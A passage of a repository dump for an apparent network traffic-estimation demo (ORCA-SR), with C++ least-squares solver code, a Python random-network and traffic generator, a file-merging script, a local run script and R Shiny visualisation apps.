"text": "using namespace std;\r\n#include <string>\r\n#include <vector>\r\n#include <map>\r\n#include <queue>\r\n#include <stack>\r\n\r\n#include \"GaussianElimination.h\"\r\n\r\nfloat * Direct(BMatrix A, float* b, float* xp, bool exact = true, float th=0)\r\n{\r\n\tint n = A.n, m = A.m, i;\r\n\tMatrix t = AAT(A, exact, th);\r\n\t//t.print(true);\r\n\tfloat* t2 = Sub(Mul(A, xp), b, n);\r\n\tfloat* tmp = new float[n]; \r\n\t// Solve system of linear equations: t*tmp = t2\r\n\tint flag = Solve(t, t2, tmp);\r\n\tfloat* tmp2 = Mul(Transpose(A), tmp);\r\n\treturn Sub(xp, Mul(Transpose(A), tmp), m);\r\n}\r\n\r\n\r\n// The following attributes are only used in the dynamic direct\r\nvector<pair<int, float> >* sig;\r\nfloat* diameter;\r\nint n, m;\r\n\r\nfloat * Dynamic_Direct(BMatrix A, float* b, float* xp, bool exact = true, float th = 0)\r\n{\r\n\t// call this, only if A has changed\r\n\tint i;\r\n\tn = A.n; m = A.m;\r\n\tsig = new vector<pair<int, float> >[A.n];\r\n\tdiameter = new float[A.n];\r\n\tMatrix t = AAT(A, exact, th);\r\n\tfloat* t2 = Sub(Mul(A, xp), b, n);\r\n\tfloat* tmp = new float[n];\r\n\tGenerateSignature(t, sig, diameter);\r\n\tSolveBySigint(n, sig, diameter, t2, tmp);\r\n\t//int flag = Solve(t, t2, tmp);\r\n\tfloat* tmp2 = Mul(Transpose(A), tmp);\r\n\treturn Sub(xp, Mul(Transpose(A), tmp), m);\r\n}\r\n\r\nfloat * Dynamic_Update(BMatrix A, float* b, float* xp, bool exact = true, float th = 0)\r\n{\r\n\t// call this, as long as A has not changed\r\n\tint i;\r\n\tfloat* t2 = Sub(Mul(A, xp), b, n);\r\n\tfloat* tmp = new float[n];\r\n\tSolveBySigint(n, sig, diameter, t2, tmp);\r\n\t//int flag = Solve(t, t2, tmp);\r\n\tfloat* tmp2 = Mul(Transpose(A), tmp);\r\n\treturn Sub(xp, Mul(Transpose(A), tmp), m);\r\n}\r\n\r\n\r\n\r\n/* Direct - Exact Unit Test\r\nint main()\r\n{\r\nstring folder = \"data/sample/\";\r\nBMatrix A(folder + \"a.txt\");\r\nint n = A.n, m = A.m;\r\nfloat* b = ReadVector(folder + \"b.txt\", n);\r\nfloat* xp = ReadVector(folder + \"xp.txt\", m);\r\n\r\n\r\nfloat * x = Direct(A, b, xp);\r\n\r\ncout << endl << \"--------------- Result -------------\" << endl;\r\nfor (int i = 0; i < m; i++)\r\ncout << x[i] << \", \";\r\ncout << endl << \"Done!\" << endl;\r\ngetchar();\r\nreturn 0;\r\n}\r\nOutput to compare with: 2.96589, 1.00147, 0.02, 1.00147, 1.03116, 0.0326316, 1.96589,\r\n*/\r\n\r\n"
},
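Reading the Direct() routine above, the computation is the least-norm correction x = xp − Aᵀ(AAᵀ)⁻¹(A·xp − b): the point satisfying A·x = b closest to the prior xp. A NumPy sketch of the same step, with illustrative data rather than the repo's inputs:

```python
# Projection step mirroring Direct(): correct the prior xp so that the
# constraints A @ x = b hold exactly, moving xp as little as possible.
import numpy as np

A = np.array([[1., 1., 0.],
              [0., 1., 1.]])
b = np.array([3., 5.])
xp = np.array([1., 1., 1.])    # e.g. a gravity-model prior

residual = A @ xp - b                              # A xp - b
x = xp - A.T @ np.linalg.solve(A @ A.T, residual)  # xp - A^T (A A^T)^-1 r

print(x)        # [0.667, 2.333, 2.667]
print(A @ x)    # [3., 5.]  -- constraints satisfied
```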
{
"alpha_fraction": 0.6472148299217224,
"alphanum_fraction": 0.6560565829277039,
"avg_line_length": 25.325580596923828,
"blob_id": "0dc90c3d9abe872c4317f5fcefa9696588bb1212",
"content_id": "0e52280ea117f9319cac3b5809a06bf6a187ccdb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 1131,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 43,
"path": "/app/rstudio-export/Interactive/app.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "library(shiny)\n\nserver <- function(input,output, session) {\n \n library(DT) \n library(ggplot2) \n \n \n file_reader <- read.csv(file = \"output.txt\", header = FALSE)\n transpose_step1 <- melt(file_reader)\n transpose_table <- as.data.frame(transpose_step1$value)\n colnames(transpose_table) <- c(\"traffic\")\n transpose_table$flow_id <- cbind(c(1:length(transpose_table$traffic)))\n \n \n mod <- transpose_table\n \n output$plot <- renderPlot({\n ggplot(mod, aes(flow_id, traffic)) + geom_point(shape=23, color=\"grey50\") +geom_rug()\n })\n \n dat <- reactive({\n user_brush <- input$user_brush\n brushedPoints(mod, user_brush, xvar = \"flow_id\", yvar = \"traffic\")\n })\n \n output$table <- DT::renderDataTable({DT::datatable(dat())})\n \n output$mydownload <- downloadHandler(\n filename = \"plotextract.csv\",\n content = function(file) {write.csv(dat(), file)}\n )\n}\n\nui <- fluidPage(\n h3(\"Subsetting the Network\"),\n plotOutput(\"plot\", brush = \"user_brush\"),\n dataTableOutput(\"table\"),\n h3(\"Download Flow Data\"),\n downloadButton(outputId = \"mydownload\", label = \"Download Table\")\n)\n\nshinyApp(ui = ui, server = server)"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 19,
"blob_id": "74e9099e501dc8902d169a96a1eb90e70214fb32",
"content_id": "a763d773d2b1c3e75c7752795bfab910c380c710",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20,
"license_type": "no_license",
"max_line_length": 19,
"num_lines": 1,
"path": "/app/rstudio-export/test.py",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "import igraph as ig\n"
},
{
"alpha_fraction": 0.5770158171653748,
"alphanum_fraction": 0.6032681465148926,
"avg_line_length": 43.70658493041992,
"blob_id": "812ddb14b72ce76b0533b70ccf25eadaa388147d",
"content_id": "8471f66dd908510eb2e7791601c5f0a663596876",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7466,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 167,
"path": "/app/rstudio-export/network_generator.py",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport igraph\nimport time\nimport pickle\nfrom the_traffic_magic import get_pareto_traffic_one\nfrom helper_scratch import igraph_get_top_routing_nodes, \\\n igraph_connect_all_top_nodes_criss_cross, go_write_partial_a_and_b, \\\n go_write_full_a_and_b\nimport os\n\n\ndef write_A_matrix(graph_file_name, A_matrix_file_name, b_vector_file_name, gravity_vector_file_name):\n # G = igraph.Graph.Read(graph_file_name, format=\"edgelist\", directed=False)\n G = igraph.Graph.Erdos_Renyi(n=100, m=70, directed=False)\n pick_level_one_routers = 100\n pick_level_one_routers = 3\n print('Done Reading')\n\n to_delete_ids = [v.index for v in G.vs if v.degree() == 0]\n G.delete_vertices(to_delete_ids)\n\n nodes = G.vs.indices\n now = time.time()\n\n # Connect the unconnected components\n unconnected = list(G.clusters())\n for one, two in zip(unconnected[:-1], unconnected[1:]):\n G.add_edges([(one[0], two[0])])\n\n top_nodes = igraph_get_top_routing_nodes(G, pick_level_one_routers)\n routing_nodes = [node for (node, val) in top_nodes]\n print('Total time for making routing nodes - ', time.time() - now, ' total routing nodes - ', len(routing_nodes))\n\n now = time.time()\n igraph_connect_all_top_nodes_criss_cross(G, routing_nodes)\n print('Criss Cross connecting time - ', time.time() - now)\n\n assert len(list(G.clusters())) == 1\n clusters = {node: {} for node in routing_nodes}\n for each in routing_nodes:\n nodes.remove(each)\n\n non_routing_nodes = nodes\n path_collector = {}\n for each_routing_node in routing_nodes:\n path_collector[each_routing_node] = G.get_shortest_paths(each_routing_node, mode=igraph.OUT,output='vpath')\n print('cluster eye shortest paths done')\n\n # code below shows the cluster assignments\n # each node is assigned to the nearest cluster according to path length\n G.vs['which_cluster'] = \"\"\n now = time.time()\n with open('igraph.pickle', 'wb') as handle:\n pickle.dump(G, handle)\n for non_routing_node in non_routing_nodes:\n path_length = 10000000000\n cluster = None\n for routing_node in path_collector:\n if len(path_collector[routing_node][non_routing_node]) < path_length:\n path_length = len(path_collector[routing_node][non_routing_node])\n cluster = routing_node\n clusters[cluster][non_routing_node] = path_collector[cluster][non_routing_node]\n # if cluster == []:\n # print('Whose cluster are you ?')\n G.vs[non_routing_node]['which_cluster'] = cluster\n # reverse_map[non_routing_node] = cluster\n print('cluster assignment took: ', time.time() - now)\n\n with open('edges.txt', 'w') as f:\n for each in G.es:\n f.write(str(each.source) + ', ' + str(each.target) + '\\n' )\n\n s_d_pair_index = 0\n #Read uses a 0 based index - so if using 1 based index be careful about indices\n start_node = 0 #in case you want to do a dumb parallelization set these values\n end_node = G.vcount() #ditto\n\n # create a fake attribute to store all sd_paths this edge participates in.\n # Igraph does not allow empty sequences - so put a sentinel and remove it later\n G.es[\"sd_pairs\"] = \"\"\n G.es[\"edge_traffic\"] = \"0\"\n\n write_head = 500000\n write_head = 50000\n write_head_adder = 500000\n write_head_adder = 50000\n\n # write_head = 500\n dir_path = os.getcwd()\n dir_path = os.path.join(dir_path, 'data')\n\n output_file_gravity = open(gravity_vector_file_name, \"w\")\n gravity = []\n original_traffic = []\n actual = open(os.path.join(dir_path, \"actual.csv\"), \"w\")\n import random\n random.shuffle(non_routing_nodes)\n for n_1 in non_routing_nodes:\n # 
print(s_d_pair_index)\n if s_d_pair_index > 1000000000:\n # if s_d_pair_index > 1000:\n break\n for n_2 in non_routing_nodes:\n if s_d_pair_index > 1000000000:\n # if s_d_pair_index > 1000:\n break\n if not n_1 == n_2:\n s_d_pair_index_as_str = str(s_d_pair_index)\n if not G.vs[n_1]['which_cluster'] == G.vs[n_2]['which_cluster']:\n path_1 = clusters[G.vs[n_1]['which_cluster']][n_1][::-1]\n path_2 = clusters[G.vs[n_2]['which_cluster']][n_2]\n path = path_1 + path_2\n else:\n path_1 = clusters[G.vs[n_1]['which_cluster']][n_1][::-1]\n path_2 = clusters[G.vs[n_2]['which_cluster']][n_2][1:]\n path = path_1 + path_2\n if path_1 == [] or path_2 == []:\n print('Where are you lost')\n traffic = get_pareto_traffic_one(1, 20)\n for (edge_src, edge_target) in zip(path[:-1], path[1:]):\n G.es[G.get_eid(edge_src, edge_target)][\"sd_pairs\"] += s_d_pair_index_as_str + \",\"\n G.es[G.get_eid(edge_src, edge_target)][\"edge_traffic\"] = str(\n int(G.es[G.get_eid(edge_src, edge_target)][\"edge_traffic\"]) + traffic)\n gravity.append(s_d_pair_index_as_str + '\\t' + str(0.02*traffic*abs(np.random.normal())))\n original_traffic.append(s_d_pair_index_as_str + '\\t' + str(traffic))\n s_d_pair_index += 1\n output_file_gravity.write('\\n'.join(gravity) + '\\n')\n actual.write('\\n'.join(original_traffic) + '\\n')\n gravity = []\n original_traffic = []\n # if s_d_pair_index > write_head:\n # write_head = go_write_partial_a_and_b(G, write_head, s_d_pair_index, 'partial_results', 50000000)\n # write_head = go_write_partial_a_and_b(G, write_head, s_d_pair_index, 'partial_results', write_head_adder)\n if len(gravity) > 0:\n output_file_gravity.write('\\n'.join(gravity))\n if len(original_traffic) > 0:\n actual.write('\\n'.join(gravity))\n\n output_file_gravity.close()\n actual.close()\n\n print('Gravity Calculation - Done')\n\n # write_head = go_write_partial_a_and_b(G, write_head, s_d_pair_index, 'partial_results', write_head_adder)\n go_write_full_a_and_b(G, s_d_pair_index)\n # output_file = open(A_matrix_file_name, \"w\")\n # output_file.write(str(G.ecount()) + \",\" + str(s_d_pair_index - 1) + \"\\n\")\n # b_file = open(b_vector_file_name, \"w\")\n #\n # for edge in G.es:\n # output_file.write(edge[\"sd_pairs\"][:-1] + \"\\n\")\n # b_file.write(edge[\"edge_traffic\"] + \"\\n\")\n # output_file.close()\n # b_file.close()\n\n# write_A_matrix(\"test_graph.txt\", \"a.csv\", 'b.csv', 'gravity.csv')\n# write_A_matrix(\"p2p-Gnutella04_Nodes_10876_edges_39994.txt\", \"a_gnutella_.csv\", 'b_gnutella.csv','gravity_gnutella.csv')\n# write_A_matrix(\"Wiki-Vote_100_edge.txt\", \"100ke_a_wiki_vote.csv\", '100ke_b_gnutella.csv','100ke_gravity_wiki_vote.csv')\n\ndir_path = os.getcwd()\ndir_path = os.path.join(dir_path, 'data')\nwrite_A_matrix(\"\", os.path.join(dir_path, \"a.csv\"), os.path.join(dir_path,'b.csv'),os.path.join(dir_path, 'g.csv'))\n# write_A_matrix(\"email_25k.txt\", \"25ke_a_email.csv\", '25ke_b_email.csv','25ke_gravity_email.csv')\n# write_A_matrix(\"p2p-Gnutella08.txt\", \"25ke_a_gnutella_.csv\", '25ke_b_gnutella.csv','25ke_gravity_gnutella.csv')\n# write_A_matrix(\"Brightkite_edges.txt\", \"200ke_a_brightkite_.csv\", '200ke_b_brightkite.csv','200ke_brightkite.csv')\n\n# write_A_matrix(\"web_Google_Nodes_875713_Edges_5105039.txt\", \"a_google.csv\", 'b_google.csv','gravity_google.csv')\n"
},
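The generator above draws per-flow demand from `get_pareto_traffic_one`, which lives in the repo's `the_traffic_magic` helper and is not shown here. Purely as an assumption about that helper's behavior, a plausible stand-in using NumPy's Pareto sampler might look like this:

```python
# Hypothetical stand-in for get_pareto_traffic_one(shape, scale); the real
# helper's signature and semantics are not visible in this dump.
import numpy as np

def pareto_traffic(shape=1.0, scale=20.0):
    # Heavy-tailed draw: most flows stay small, a few become elephants
    return int(scale * (1 + np.random.pareto(shape)))

print([pareto_traffic() for _ in range(5)])
```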
{
"alpha_fraction": 0.5249999761581421,
"alphanum_fraction": 0.6499999761581421,
"avg_line_length": 38,
"blob_id": "3b90eacc0616d0bc0570088d92319e56602d2bc4",
"content_id": "973f881109452f5f783e68f25d64a29951234b60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 200,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 5,
"path": "/SR/RunScript4.sh",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "./SR -f data/200ke/8M/ -o outpute.txt\r\n./SR -f data/200ke/16M/ -o outpute.txt\r\n./SR -f data/200ke/32M/ -o outpute.txt\r\n./SR -f data/200ke/64M/ -o outpute.txt\r\n./SR -f data/200ke/128M/ -o outpute.txt\r\n"
},
{
"alpha_fraction": 0.4961636960506439,
"alphanum_fraction": 0.5127876996994019,
"avg_line_length": 25.100000381469727,
"blob_id": "e4bbe7a8b479e40b436f78c5bfd866917a4e7982",
"content_id": "4df997892a8110d77477a498cee16f9eea914201",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 782,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 30,
"path": "/app/rstudio-export/Interactive_test/ui.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "library(ggplot2)\nlibrary(Cairo) # For nicer ggplot2 output when deployed on Linux\nlibrary(shiny)\n# We'll use a subset of the mtcars data set, with fewer columns\n# so that it prints nicel\n\nshinyUI(fluidPage(\n fluidRow(\n column(width = 4,\n plotOutput(\"plot1\", height = 300,\n # Equivalent to: click = clickOpts(id = \"plot_click\")\n click = \"plot1_click\",\n brush = brushOpts(\n id = \"plot1_brush\"\n )\n )\n )\n ),\n fluidRow(\n # column(width = 6,\n # h4(\"Points near click\"),\n # verbatimTextOutput(\"click_info\")\n # ),\n column(width = 6,\n h4(\"Brushed points\"),\n verbatimTextOutput(\"brush_info\")\n )\n )\n)\n)"
},
{
"alpha_fraction": 0.5875961780548096,
"alphanum_fraction": 0.6170212626457214,
"avg_line_length": 24.674419403076172,
"blob_id": "0c88bf37a738d5d0da1ad60b36e76a94f104dd1d",
"content_id": "199bfef0a6e43a3736e18b876ef6f278dd203143",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2209,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 86,
"path": "/app/rstudio-export/test2.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "# Generate colors based on media type:\n\nlibrary(plotly)\nlibrary(igraph)\nlibrary(threejs)\nlibrary(htmlwidgets)\n# data(karate, package=\"igraphdata\")\n# G <- upgrade_graph(karate)\n\n\n\nf <- read.csv(file = \"edges_with_index_1.csv\", header = FALSE)\nedges <- c()\nprint(dim(f)[1])\nfor (e in 1:dim(f)[1]){\n edges <- append(edges, c(f[e, 1], f[e, 2]))\n}\nlength(edges)\nG <- make_graph(edges)\nE(G)\nprint(length(V(G)))\nprint(length(E(G)))\nnet = G\nnet.js <- net\ngraph_attr(net.js, \"layout\") <- NULL \ngjs <- graphjs(net.js, main=\"Network!\", bg=\"gray10\", showLabels=F, stroke=F, \n curvature=0.1, attraction=0.9, repulsion=0.8, opacity=0.2)\nprint(gjs)\nsaveWidget(gjs, file=\"Media-Network-gjs.html\")\nbrowseURL(\"Media-Network-gjs.html\")\nnet <- simplify(net, remove.multiple = F, remove.loops = T) \nplot(net, edge.arrow.size=.4,vertex.label=NA)\n\nplot(net)\ncolrs <- c(\"gray50\", \"tomato\", \"gold\")\n#V(net)$color <- colrs[V(net)$media.type]\n\n# Compute node degrees (#links) and use that to set node size:\ndeg <- degree(net, mode=\"all\")\n# V(net)$size <- deg*3\n# We could also use the audience size value:\n# V(net)$size <- V(net)$audience.size*0.6\n\n# The labels are currently node IDs.\n# Setting them to NA will render no labels:\n# V(net)$label <- NA\n\n# Set edge width based on weight:\n# E(net)$width <- E(net)$weight/6\n\n#change arrow size and edge color:\nE(net)$arrow.size <- .2\nE(net)$edge.color <- \"gray80\"\n\n# We can even set the network layout:\ngraph_attr(net, \"layout\") <- layout_with_lgl\n#plot_ly(net)\nprint(length(V(net)))\nl = layout_on_sphere(net)\n\np <- plot_ly(as.data.frame(l), x=l[,1], y = l[,2], z = l[,3],type = 'scatter3d')%>% \nadd_paths(x=lines_df_x,y=lines_df_y,z=lines_df_z)\n#,x=lines_df_x,y=lines_df_y,z=lines_df_z\nf <- read.csv(file = \"edges_with_index_1.csv\", header = FALSE)\n\nprint(length(f$V1))\nlines_df_x <- c()\nlines_df_y <- c()\nlines_df_z <- c()\nfor (i in 1:(length(f$V1))){\n p1 <- (f[i, 1])\n p2 <- (f[i, 2])\n x1 <- (l[p1,1])\n y1 <- (l[p1,2])\n z1 <- (l[p1,3])\n x2 <- (l[p2,1])\n y2 <- (l[p2,2])\n z2 <- (l[p2,3])\n\n lines_df_x <- c(lines_df_x, x1, x2, rep(NA,1))\n lines_df_y <- c(lines_df_y,y1, y2, rep(NA,1))\n lines_df_z <- c(lines_df_z,z1, z2, rep(NA,1))\n print(i)\n \n \n}\n\n"
},
{
"alpha_fraction": 0.6601731777191162,
"alphanum_fraction": 0.6948052048683167,
"avg_line_length": 37.58333206176758,
"blob_id": "38291f1a74322a0e16945f3cc7e979a4e577b754",
"content_id": "ad4aebcbe3a3bed550058f9241a2f503c4eeaba5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 462,
"license_type": "no_license",
"max_line_length": 230,
"num_lines": 12,
"path": "/app/rstudio-export/Interactive/colorScheme/app.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "library(shiny)\nrequire(heatmaply)\nui <- basicPage(\n plotlyOutput(\"heatmap\",height = \"800px\",width = \"800px\")\n)\nserver <- function(input, output) {\n mat <- read.csv(\"aat.csv\", header = FALSE)\n # print(mat)\n output$heatmap <- renderPlotly(heatmaply(mat, Rowv = FALSE, Colv = FALSE, margins = c(40,40,40,40), showticklabels = FALSE,scale_fill_gradient_fun = ggplot2::scale_fill_gradient2(low = \"white\", high = \"red\"),hide_colorbar=TRUE))\n}\n\nshinyApp(ui, server)"
},
{
"alpha_fraction": 0.4958506226539612,
"alphanum_fraction": 0.5532503724098206,
"avg_line_length": 22.322580337524414,
"blob_id": "1798a77e8222ceda04d5535fcb2268738ad90c86",
"content_id": "4c26491f1fc1bc84199d800aaa543f3d0eaf5f48",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 1446,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 62,
"path": "/app/rstudio-export/small_test.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "f <- read.csv(file = \"edges_1_5.csv\", header = FALSE)\nedges <- c()\ng= graph()\n# read.graph(\"edges_1_5.csv\", format=\"edgelist\")\n# read.graph(\"edges_1_5.txt\", format=\"edgelist\")\nprint(dim(f)[1])\nfor (e in 1:dim(f)[1]){\n edges <- append(edges, c(f[e, 1], f[e, 2]))\n}\n\nprint(edges)\nlength(edges)\nG <- graph_from_edgelist(as.matrix(f), directed = TRUE)\n# G = graph_from_literal(7--8, 5--32, 24--43, 50--66, 34--70)\nV(G)\nE(G)\n\nG = graph.data.frame(f, directed=TRUE, vertices=NULL)\nV(G)\nE(G)\n\nl = layout_on_sphere(G)\nlines_df_x <- c()\nlines_df_y <- c()\nlines_df_z <- c()\nprint(length(f$V1))\nmapper = c()\ni = 1\n\nlist_data <- list(c(V(G)$name))\nmatch(\"8\", list_data)\nlist_data\nlist_data <- as.numeric(list_data)\nlist_data_1 <- list()\nfor (j in 1:length(V(G))){\n # print(c(list_data[[1]][j]))\n list_data_1 <- append(list_data_1, c(list_data[[1]][j]))\n # print(list_data[[1]][j])\n}\n\n\nfor (i in 1:(length(f$V1))){\n p1 <- (f[i, 1])\n p2 <- (f[i, 2])\n p1 <- match(p1, list_data[[1]])\n p2 <- match(p2, list_data[[1]])\n print(p1)\n print(p2)\n x1 <- (l[p1,1])\n y1 <- (l[p1,2])\n z1 <- (l[p1,3])\n x2 <- (l[p2,1])\n y2 <- (l[p2,2])\n z2 <- (l[p2,3])\n \n lines_df_x <- c(lines_df_x, x1, x2, rep(NA,1))\n lines_df_y <- c(lines_df_y,y1, y2, rep(NA,1))\n lines_df_z <- c(lines_df_z,z1, z2, rep(NA,1))\n print(i)}\np <- plot_ly(as.data.frame(l), x=l[,1], y = l[,2], z = l[,3],type = 'scatter3d')%>% \n add_paths(x=lines_df_x,y=lines_df_y,z=lines_df_z)\np\n"
},
{
"alpha_fraction": 0.5254079103469849,
"alphanum_fraction": 0.550582766532898,
"avg_line_length": 32,
"blob_id": "e228d30191a8d398d1e787a4d2e1b637b5d16188",
"content_id": "626d5096bb29463317b2dd648a66ae6a7f8574e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2145,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 65,
"path": "/app/rstudio-export/combine_input.py",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nimport sys\nimport os\n\n\ndef combine_inputs(file1, file2):\n # print(file1, file2)\n f1 = open(file1, 'r')\n f2 = open(file2, 'r')\n edges1, sd_pairs = (f1.readline().split(\",\"))\n edges2, sd_pairs_latest = (f2.readline().split(\",\"))\n sd_pairs = int(sd_pairs.strip())\n sd_pairs_latest = int(sd_pairs_latest.strip())\n assert edges1 == edges2\n # print(sd_pairs, sd_pairs_latest)\n assert sd_pairs_latest > sd_pairs\n # print(f1.readline())\n\n # dirName = 'results/edges_' + str(edges1) + '_sd_pairs_' + str(sd_pairs_latest)\n dirName = 'edges_' + str(edges1) + '_sd_pairs_' + str(sd_pairs_latest)\n\n try:\n os.mkdir(dirName)\n except FileExistsError:\n print(\"Directory \", dirName, \" already exists\")\n\n new_file = open(dirName + '/a.txt', 'w')\n\n original_new_file = open(dirName + '/a_jees.txt', 'w')\n\n new_file.write(str(edges1.strip()) + ',' + str(sd_pairs_latest) + '\\n')\n original_new_file.write(str(edges1.strip()) + ',' + str(sd_pairs_latest) + '\\n')\n new_file.flush()\n\n\n original_new_file.flush()\n for first, second in zip(f1, f2):\n new_line_1 = \"\"\n new_line = \"\"\n first = first.split('\\t')\n second = second.split('\\t')\n assert first[0] == second[0]\n\n new_line_1 = str(first[0]) + \"\\t\"\n first_null = True\n if first[1].strip() != '':\n first_null = False\n new_line = first[1].strip()\n if second[1].strip() != '':\n if not first_null:\n new_line = new_line + ','\n new_line = new_line + second[1].strip()\n new_line = new_line.strip() + \"\\n\"\n new_line_1 = str(first[0]) + \"\\t\" + new_line\n # new_line = first[1].strip() + ',' + second[1].strip() + '\\n'\n # new_line_1 = str(first[0]) + '\\t' + first[1].strip() + ',' + second[1].strip() + '\\n'\n new_file.write(new_line)\n new_file.flush()\n original_new_file.write(new_line_1)\n original_new_file.flush()\n\n\ncombine_inputs(sys.argv[1], sys.argv[2])\n# combine_inputs(\"partial_results_A_upto_502200.csv\", \"partial_results_A_upto_1004400.csv\")\n"
},
{
"alpha_fraction": 0.5922619104385376,
"alphanum_fraction": 0.6101190447807312,
"avg_line_length": 27,
"blob_id": "737242cabaeb57f422fe6f06cf4a0ffacc8012b8",
"content_id": "f33cbc285f2e9a724448bab03bb21de761f292f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 672,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 24,
"path": "/app/rstudio-export/Interactive_test/server.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "\nlibrary(shiny)\nmtcars2 <- mtcars[, c(\"mpg\", \"cyl\", \"disp\", \"hp\", \"wt\", \"am\", \"gear\")]\n\nshinyServer(function(input, output) {\n output$plot1 <- renderPlot({\n ggplot(mtcars2, aes(wt, mpg)) + geom_point()\n })\n \n # output$click_info <- renderPrint({\n # # Because it's a ggplot2, we don't need to supply xvar or yvar; if this\n # # were a base graphics plot, we'd need those.\n # nearPoints(mtcars2, input$plot1_click, addDist = TRUE)\n # print(input$plot1_click)\n # })\n k = 0\n output$brush_info <- renderPrint({\n print('hi')\n # print(input)\n k <- k+1\n # print(k)\n print(input$plot1_brush)\n brushedPoints(mtcars2, input$plot1_brush)\n })\n})"
},
{
"alpha_fraction": 0.38457176089286804,
"alphanum_fraction": 0.4001701772212982,
"avg_line_length": 39.068180084228516,
"blob_id": "2fe9d75ae810f800141455f169db91623966ef23",
"content_id": "b707f18d76d1b075c14748bade797910e4ae2be8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 3526,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 88,
"path": "/app/rstudio-export/ui.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "library(shiny)\nlibrary(plotly)\n# Define UI for application that draws a histogram\nshinyUI(navbarPage(\"ORCA-SR\",\n\n # Application title\n tabPanel(\"3D Visualization\",\n\n # Sidebar with a slider input for number of bins\n sidebarLayout(\n sidebarPanel(\n \n selectInput(inputId = \"type\",\n label = \"Type of Graph\",\n choices = c(\"Rene Erdos\",\"P2P-Gnutella\"),\n selected = \"P2P-Gnutella\"),\n selectInput(inputId = \"traffic\",\n label = \"Type of Traffic\",\n choices = c(\"Pareto\",\"Uniform\"),\n selected = \"Uniform\"),\n selectInput(inputId = \"prior\",\n label = \"Type of Prior\",\n choices = c(\"Gravity\",\"Perturbed\"),\n selected = \"Gravity\"),\n numericInput(inputId = \"node\",\n label = \"Number of Nodes\",\n min = 1,\n max = 10000,\n value = 100),\n selectInput(inputId = \"threshold\",\n label = \"Threshold\",\n choices = c(\"SD_Pair/10\",\"SD_Pair/100\", \"SD_Pair/1000\", \"SD_Pair/100000\"),\n selected = \"Red\"),\n submitButton(text = \"Generate Network\", icon = NULL, width = NULL),\n # Horizontal line ----\n tags$hr(),\n fileInput(\"file1\", \"Choose Edge (.csv)\",\n multiple = FALSE,\n accept = c(\"text/csv\",\n \"text/comma-separated-values,text/plain\",\n \".csv\")),\n fileInput(\"file1\", \"Choose Traffic (.csv)\",\n multiple = FALSE,\n accept = c(\"text/csv\",\n \"text/comma-separated-values,text/plain\",\n \".csv\")),\n fileInput(\"file1\", \"Choose Prior (.csv)\",\n multiple = FALSE,\n accept = c(\"text/csv\",\n \"text/comma-separated-values,text/plain\",\n \".csv\")),\n submitButton(text = \"Generate Network\", icon = NULL, width = NULL)\n ),\n \n \n # Show a plot of the generated distribution\n mainPanel(\n plotlyOutput(\"distPlot\")\n ))\n ),\n tabPanel(\"SD Flows\",\n dataTableOutput(\"test\")\n ),\n tabPanel(\"SD Subsetting\",\n plotOutput(\"plot2\", height = 300,\n dblclick = \"plot_dblclick\",\n brush = brushOpts(\n id = \"plot1_brush\")),\n fluidRow(\n # column(width = 6,\n # h4(\"Points near click\"),\n # verbatimTextOutput(\"click_info\")\n # ),\n column(width = 12,\n h4(\"Selected Flows\"),\n verbatimTextOutput(\"brush_info\")\n )\n )\n ),\n tabPanel(\"Threshold\"\n # mainPanel(\n # column(6,\n # plotlyOutput(\"heatmap\",height = \"700px\",width = \"700px\")),\n # column(6,\n # plotlyOutput(\"heatmap2\",height = \"700px\",width = \"700px\")))\n\n )\n))\n"
},
{
"alpha_fraction": 0.4051724076271057,
"alphanum_fraction": 0.4137931168079376,
"avg_line_length": 33.79999923706055,
"blob_id": "303d6c4e7a6c63e003b978f855268a92d9213c57",
"content_id": "72b1ecb38ea208d2804cd19528a3492de7ae93ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2436,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 70,
"path": "/app/rstudio-export/Interactive_test/Check_fluidPage/testapp.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
